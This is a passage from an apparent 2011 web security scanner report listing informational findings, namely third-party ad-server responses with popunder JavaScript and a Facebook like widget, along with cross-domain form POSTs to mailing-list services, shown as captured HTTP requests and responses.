O:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!,=!2<+!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!,=!2<(!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!,=!2<(!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!,=!2<(!#MTF!!!!,=!2<(!#MTH!!!!,=!2<(!#MTI!!!!,=!2<(!#MTJ!!!!,=!2<(!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!2=!2<(!#SF3!!!!2=!2<(!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!,=!2<(!#UDP!!!!2=!2<(!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!,=!2<(!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!,=!2<(!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!,=!2<(!#tM)!!!!,=!2<(!#tn2!!!!,=!2<(!#uE=!!!!#<x9#K!#uJY!!!!2=!2<(!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!,=!2<(!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!/=!2<(!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!/=!2<(!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:25 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0358.rm.bf1
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 12:02:25 GMT
Pragma: no-cache
Content-Length: 6818
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

oV1=window; function fStart(u,n,v) { if (!oV1.opera) var twin=oV1.open(u,n,v); if (!window.fV1) {fV13();} var w=oV2(u,n,v); var wo=vWA[w]; wo.pw=twin; fV3("fV10(" + w + ")",100); return (wo.pw&&fV35)
...[SNIP]...
wUtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADsRBEAAAAAAAICAgAAAAAAaJHtfD81IkBoke18PzUiQAAAAAAAAAAA..-.J2RBLUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADlhh4N0bAUCvWwAJk.ezR3ozd5uL1NqfooU4dyAAAAAA==,,,Z%3D0x0%26anmember%3D541%26anprice%3D%26y%3D29%26s%3D1748713%26_salt%3D1407533862%26B%3D10%26r%3D0,b37ed424-7c8f-11e0-8c5d-a30c628d5c81','','height='+screen.height+',width=' + screen.width + ',left=0,top=0,toolbar=0,status=0,menubar=0,resizable=1,scrollbars=1,location=0');
pop.blur();
window.focus();

17.2. http://ads.adbrite.com/adserver/vdi/742697 previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/742697

Request 1

Response 1

Request 2

GET /adserver/vdi/742697?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjFp47PDiITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJloMgFEX3wtgBoKgnu9HYoNJIo0ZD9h4gSR2t6eX%2Bx%2FvwBCsGtyeY2n2TujHgBvTG%2BOKQ4qYoHHIwCcAEMBdNBHdKy17BavWQ9ZY77OrEDINIg1XDOObQOMHgCjJhYvvPUetd3CRKpcfmSZlq5gkiP6%2BTF%2B9H%2BYUa1jLmSW036QqX1%2BmfKP6Ns3zY8yzQBi7s3J7OHh4jvaxE5RmaKbXB4kqguFLGpV9pfqzKR2k0rtnngbgUsbdqym9abDOQa21stM%2BZ904IVzmE7JGYsst5yCLj41ykxWGUwv5bBOElWhM5XZAX9%2FMFIAF1JUSrh%2FiP4PV6Aw%3D%3D"; vsd=0@1@4dcaa3a0@d.xp1.ru4.com

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 12 May 2011 11:40:13 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxilttrGDyITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; path=/; domain=.adbrite.com; expires=Wed, 10-Aug-2011 11:40:13 GMT
Set-Cookie: ut="1%3AXZHJloMgEEX%2FhbULQFFP%2FkbjzCSDGg359wDpdGtvb91XvDo8wYrB7Qlou29SNwbcgN4YXxxS3BSFQw4mAZgA5qKJ4D4MZa9gtXrIessddnVixlGkwaphjDk0URhcQSgmtv%2BMWu%2FiJlEqPTZPylQzTxD5ep28eF%2FKL9SwljFPartJV7i8Tn9F8S%2FO8nHPs0AbuLBz%2B2H28JiGz0nzY1V%2BrNG0ZhEYmtpgcCVQPCfjEv6F5TmsuRSxt2rKnydim5Fca2Oj%2Fa5574RwlUPIHokpu5yHd8n0OLdrcYgOsD%2Fty4v7dR9FeIlZSoIGElBXQrR6jP8IXq83"; path=/; domain=.adbrite.com; expires=Sun, 09-May-2021 11:40:13 GMT
Set-Cookie: vsd=; path=/; domain=.adbrite.com; expires=Thu, 12-May-2011 11:40:13 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

17.3. http://adserving.cpxinteractive.com/st previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://adserving.cpxinteractive.com
Path:	/st

Request 1

GET /st?ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:01:57 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:01:57 GMT
Content-Length: 669

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&referrer=http://pepperhamilton.com/%3Fepl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1748713%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3D0%26pop_nofreqcap%3D1"></scr'+'ipt>');

Request 2

GET /st?ad_type=pop&ad_size=0x0&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 12:02:20 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 12 May 2011 12:02:20 GMT
Content-Length: 407

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&inv_code=1748713&media_subtypes=popunder&pop_freq_times=1&pop_freq_duration=0&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dpop%26ad_size%3D0x0%26section%3D1748713%26banned_pop_types%3D29%26pop_times%3D1%26pop_frequency%3D0%26pop_nofreqcap%3D1"></scr'+'ipt>');

17.4. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110512_0700%26ssh%3DS423239929%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.145.48
X-Cnection: close
Date: Thu, 12 May 2011 10:59:38 GMT
Content-Length: 8669

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dcbbd9ad7ecc8456782034" class="connect_widget" style="font-family: "arial", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today's picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem"> · <a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 199 others like this.</span><span class="connect_widget_not_connected_text">199 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&partner_id=bing.com&placement=like_button&extra_1=http%3A%2F%2Fwww.bing.com%2F&extra_2=US" target="_blank">Sign Up</a> to see
...[SNIP]...

Request 2

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110512_0700%26ssh%3DS423239929%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.203.56
X-Cnection: close
Date: Thu, 12 May 2011 10:59:49 GMT
Content-Length: 8598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dcbbda5645ce8d57757557" class="connect_widget" style="font-family: "arial", sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Today's picture</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem"> · <a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 199 others like this.</span><span class="connect_widget_not_connected_text">199 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&partner_id&placement=like_button&extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_
...[SNIP]...

18. Cross-domain POST previous next
There are 9 instances of this issue:

http://privatemoneytalk.com/
http://privatemoneytalk.com/
http://www.vcgate.com/Private-Equity.htm
http://www.vcgate.com/favicon.ico
http://www.vcgate.com/favicon.ico
http://www.vcgate.com/favicon.ico
http://www.vcgate.com/favicon.ico
http://www.vcgate.com/favicon.ico
http://www.vcgate.com/favicon.ico

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

18.1. http://privatemoneytalk.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://privatemoneytalk.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain fcg.infusionsoft.com. The form contains the following fields:

infusion_xid
infusion_type
infusion_name
Contact0FirstName
Contact0Email
submit

Request

Response

18.2. http://privatemoneytalk.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://privatemoneytalk.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain fcg.infusionsoft.com. The form contains the following fields:

infusion_xid
infusion_type
infusion_name
Contact0FirstName
Contact0Email
submit

Request

Response

18.3. http://www.vcgate.com/Private-Equity.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcgate.com
Path:	/Private-Equity.htm

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

meta_web_form_id
meta_split_id
unit
redirect
meta_redirect_onlist
meta_adtracking
meta_message
meta_required
meta_forward_vars
name
from
submit

Request

GET /Private-Equity.htm HTTP/1.1
Host: www.vcgate.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:03:53 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-type: text/html
Content-Length: 13102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!-- Google Website Op
...[SNIP]...
<center><form method="post" action="http://www.aweber.com/scripts/addlead.pl">
<input type="hidden" name="meta_web_form_id" value="663859">
...[SNIP]...

18.4. http://www.vcgate.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vcgate.com
Path:	/favicon.ico

Issue detail

The page contains a form which POSTs data to the domain www.aweber.com. The form contains the following fields:

meta_web_form_id
meta_split_id
unit
redirect
meta_redirect_onlist
meta_adtracking
meta_message
meta_required
meta_forward_vars
name
from
submit

Request

GET /favicon.ico HTTP/1.1
Host: www.vcgate.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=28331451.1305198197.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmx=28331451.; __utmxx=28331451.; __utma=28331451.1717277298.1305198197.1305198197.1305198197.1; __utmc=28331451; __utmb=28331451.4.10.1305198197

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 11:05:35 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
X-Pingback: http://www.vcgate.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 12 May 2011 11:05:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Length: 38977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div style="float:left; width:220px; padding-left:20px;">
<form method="post" action="http://www.aweber.com/scripts/addlead.pl">
